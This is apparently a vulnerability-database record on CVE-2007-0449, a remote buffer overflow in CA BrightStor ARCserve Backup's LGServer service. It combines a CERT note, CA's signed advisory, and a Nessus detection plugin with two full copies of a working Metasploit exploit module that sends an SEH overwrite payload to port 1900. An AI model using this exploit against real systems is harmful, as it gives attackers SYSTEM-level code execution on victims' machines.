[BrightStor Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23357308 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>\n * <http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97696>\n * <http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34993>\n * <http://secunia.com/advisories/23897>\n * <http://xforce.iss.net/xforce/xfdb/31704>\n * <http://osvdb.org/displayvuln.php?osvdb_id=31593>\n * <http://www.securityfocus.com/bid/22199>\n\n### Acknowledgements\n\nThis vulnerability was disclosed by Computer Associates, who in turn credit NGSS.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-0449](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-0449>) \n---|--- \n**Severity Metric:** | 23.33 \n**Date Public:** | 2007-01-23 \n**Date First Published:** | 2007-01-31 \n**Date Last Updated: ** | 2007-02-02 20:17 UTC \n**Document Revision: ** | 13 \n", "modified": "2007-02-02T20:17:00", "published": "2007-01-31T00:00:00", "id": "VU:357308", "href": "https://www.kb.cert.org/vuls/id/357308", "type": "cert", "title": "Computer Associates BrightStor ARCserve Backup LGSERVER.EXE heap buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-01T23:47:04", "description": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow. CVE-2007-0449. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0449"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16400", "href": "https://www.exploit-db.com/exploits/16400/", "sourceData": "##\r\n# $Id: lgserver.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\r\n\t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could\r\n\t\t\t\toverflow the buffer and execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-0449' ],\r\n\t\t\t\t\t[ 'OSVDB', '31593' ],\r\n\t\t\t\t\t[ 'BID', '22342' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 600,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows 2000 Pro English All',\t\t{ 'Ret' => 0x75022ac4 } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 31 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(1900)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tfiller = \"0000016705\" + rand_text_english(2322)\r\n\t\tseh = generate_seh_payload(target.ret)\r\n\t\tsploit = filler + seh + \"\\x58\" * 0x4141\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tsock.put(sploit)\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16400/"}], "metasploit": [{"lastseen": "2020-07-24T21:13:43", "description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.\n", "published": "2007-02-04T01:58:50", "type": "metasploit", "title": "CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0449"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/LGSERVER", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could\n overflow the buffer and execute arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2007-0449' ],\n [ 'OSVDB', '31593' ],\n [ 'BID', '22342' ],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 600,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 2000 Pro English All',\t\t{ 'Ret' => 0x75022ac4 } ],\n ],\n 'DisclosureDate' => 'Jan 31 2007',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(1900)\n ])\n end\n\n def exploit\n connect\n\n filler = \"0000016705\" + rand_text_english(2322)\n seh = generate_seh_payload(target.ret)\n sploit = filler + seh + \"\\x58\" * 0x4141\n\n print_status(\"Trying target #{target.name}...\")\n\n sock.put(sploit)\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/brightstor/lgserver.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:20", "bulletinFamily": "software", "cvelist": ["CVE-2007-0449"], "description": " \r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nTitle: [CAID 34993]: CA BrightStor ARCserve Backup for Laptops and \r\nDesktops Multiple Overflow Vulnerabilities\r\n\r\nCA Vuln ID (CAID): 34993\r\n\r\nCA Advisory Date: 2007-01-23\r\n\r\nDiscovered By: Next Generation Security Software\r\n\r\nImpact: Remote attacker can cause a denial of service or execute \r\narbitrary code.\r\n\r\nSummary: CA BrightStor ARCserve Backup for Laptops and Desktops \r\ncontains multiple overflow conditions that can allow a remote \r\nattacker to cause a denial of service, or execute arbitrary code \r\nwith local SYSTEM privileges on Windows.\r\n\r\nMitigating Factors: None.\r\n\r\nSeverity: CA has given these vulnerability issues a High risk \r\nrating.\r\n\r\nAffected Products:\r\nBrightStor Products:\r\n BrightStor ARCserve Backup for Laptops and Desktops r11.1 SP1\r\n BrightStor ARCserve Backup for Laptops and Desktops r11.1\r\n BrightStor ARCserve Backup for Laptops and Desktops r11.0\r\n BrightStor Mobile Backup r4.0\r\nCA Protection Suites r2:\r\n CA Desktop Protection Suite r2\r\n CA Business Protection Suite r2\r\n CA Business Protection Suite for Microsoft Small Business \r\n Server Standard Edition r2\r\n CA Business Protection Suite for Microsoft Small Business \r\n Server Premium Edition r2\r\nCA Desktop Management Suite:\r\n DMS r11.0\r\n DMS r11.1\r\n\r\nAffected platforms:\r\nMicrosoft Windows\r\n\r\nStatus and Recommendation: \r\nCustomers with vulnerable versions of the BrightStor ARCserve \r\nBackup Laptops & Desktops product should upgrade to the latest \r\nversions, which are available for download from \r\nhttp://supportconnect.ca.com. \r\nBABLD r11.1 SP2 \u2013 SP2 does not contain the vulnerability, so there \r\n is no fix to apply.\r\nBABLD r11.1 SP1 - QO83833\r\nBABLD r11.0 - QI85497\r\nDMS r11.1 - QO85401\r\nDMS r11.0 - QI85423\r\nBMB r4.0 - QO85402\r\n\r\nDetermining if you are affected:\r\nRefer to the appropriate APAR for details.\r\n\r\nReferences (URLs may wrap): \r\nCA SupportConnect:\r\nhttp://supportconnect.ca.com/\r\nCA SupportConnect Security Notice for this vulnerability:\r\nImportant Security Notice for BrightStor ARCserve Backup for \r\nLaptops & Desktops\r\nhttp://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimps\r\nec-notice.asp\r\nSolution Document Reference APARs: \r\nQO83833, QI85497, QO85401, QI85423, QO85402\r\nCA Security Advisor posting:\r\nCA BrightStor ARCserve Backup for Laptops and Desktops Multiple \r\nOverflow Vulnerabilities\r\nhttp://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97696\r\nCAID: 34993\r\nCAID Advisory link:\r\nhttp://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34993\r\nDiscoverer: Next Generation Security Software\r\nNext Generation Security Software advisories:\r\nhttp://www.ngssoftware.com/\r\nCVE Reference: CVE-2007-0449\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0449\r\nOSVDB Reference: OSVDB ID: 31593\r\nhttp://osvdb.org/31593\r\n\r\nChangelog for this advisory:\r\nv1.0 - Initial Release\r\n\r\nCustomers who require additional information should contact CA \r\nTechnical Support at http://supportconnect.ca.com.\r\n\r\nFor technical questions or comments related to this advisory,\r\nplease send email to vuln@ca.com.\r\n\r\nIf you discover a vulnerability in CA products, please report\r\nyour findings to vuln@ca.com, or utilize our "Submit a \r\nVulnerability" form.\r\nURL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx\r\n\r\n\r\nRegards,\r\nKen Williams ; 0xE2941985\r\nDirector, CA Vulnerability Research\r\n\r\nCA, One CA Plaza, Islandia, NY 11749\r\n \r\nContact http://www3.ca.com/contact/\r\nLegal Notice http://www3.ca.com/legal/\r\nPrivacy Policy http://www3.ca.com/privacy/\r\nCopyright (c) 2007 CA. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.1\r\n\r\niQA/AwUBRbeBc3klkd/ilBmFEQJG0gCfU2yQqk/uLptvrB+sYb3eNQjPNdkAn08/\r\n8iR6Fz4tAXZYN+CXFy8awg8L\r\n=8k42\r\n-----END PGP SIGNATURE-----\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2007-01-24T00:00:00", "published": "2007-01-24T00:00:00", "id": "SECURITYVULNS:DOC:15821", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15821", "title": "[Full-disclosure] [CAID 34993]: CA BrightStor ARCserve Backup for Laptops and Desktops Multiple Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:22", "bulletinFamily": "software", "cvelist": ["CVE-2007-1448", "CVE-2007-1785", "CVE-2007-0449", "CVE-2007-0169", "CVE-2007-0672", "CVE-2007-14478", "CVE-2006-5172", "CVE-2006-5171", "CVE-2007-0673", "CVE-2006-6917", "CVE-2007-0816", "CVE-2007-0168", "CVE-2006-6076", "CVE-2007-1447"], "description": "Buffer overflow\u044b in backup discovery service and tape engine, backup message system.", "edition": 1, "modified": "2007-04-01T00:00:00", "published": "2007-04-01T00:00:00", "id": "SECURITYVULNS:VULN:6903", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:6903", "title": "Brightstor ArcServe Backup buffer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-02-01T01:23:46", "description": "According to its version, the installation of BrightStor ARCserve\nBackup for Laptops & Desktops Server on the remote host is affected by\nmultiple buffer overflows and denial of service vulnerabilities that\ncan be exploited by a remote attacker to execute arbitrary code on the\naffected host with LOCAL SYSTEM privileges or to crash the associated\nservices.", "edition": 27, "published": "2007-01-26T00:00:00", "title": "CA BrightStor ARCserve Backup for Laptops & Desktops Server Multiple Vulnerabilities (QO83833)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0449", "CVE-2007-0672", "CVE-2007-0673"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:ca:brightstor_arcserve_backup_laptops_desktops"], "id": "ARCSERVE_QO83833.NASL", "href": "https://www.tenable.com/plugins/nessus/24240", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24240);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2007-0449\", \"CVE-2007-0672\", \"CVE-2007-0673\");\n script_bugtraq_id(22199, 22337, 22339, 22340, 22342);\n\n script_name(english:\"CA BrightStor ARCserve Backup for Laptops & Desktops Server Multiple Vulnerabilities (QO83833)\");\n script_summary(english:\"Checks version of BrightStor ARCserve Backup for Laptops & Desktops Server\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote backup server software is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of BrightStor ARCserve\nBackup for Laptops & Desktops Server on the remote host is affected by\nmultiple buffer overflows and denial of service vulnerabilities that\ncan be exploited by a remote attacker to execute arbitrary code on the\naffected host with LOCAL SYSTEM privileges or to crash the associated\nservices.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2007/Jan/682\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2007/Jan/683\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2007/Jan/685\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2007/Jan/686\");\n # https://web.archive.org/web/20070206063608/http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a4ee8257\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch as described in the vendor advisory\nreferenced above.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/01/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/01/23\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/01/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:brightstor_arcserve_backup_laptops_desktops\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"arcserve_lgserver_admin_detect.nasl\");\n script_require_keys(\"ARCSERVE/LGServer/Version\");\n\n exit(0);\n}\n\n\nver = get_kb_item(\"ARCSERVE/LGServer/Version\");\nif (isnull(ver)) exit(0);\n\n\nmatches = eregmatch(string:ver, pattern:\"^([0-9]+\\.[0-9]+)\\.([0-9]+)$\");\nif (!isnull(matches))\n{\n ver = matches[1];\n build = int(matches[2]);\n\n if (\n (ver == \"11.1\" && build < 900) ||\n # nb: QI85497 says there's no patch for 11.0; the solution is to \n # upgrade to 11.1 and then apply BABLD r11.1 SP2.\n (ver == \"11.0\") ||\n # nb: QO85402 doesn't exist.\n (ver == \"4.0\")\n )\n {\n # Issue a report for each open port used by the server.\n port = get_kb_item(\"Services/lgserver\");\n if (port && get_tcp_port_state(port)) security_hole(port);\n\n port = get_kb_item(\"Services/lgserver_admin\");\n if (port && get_tcp_port_state(port)) security_hole(port);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}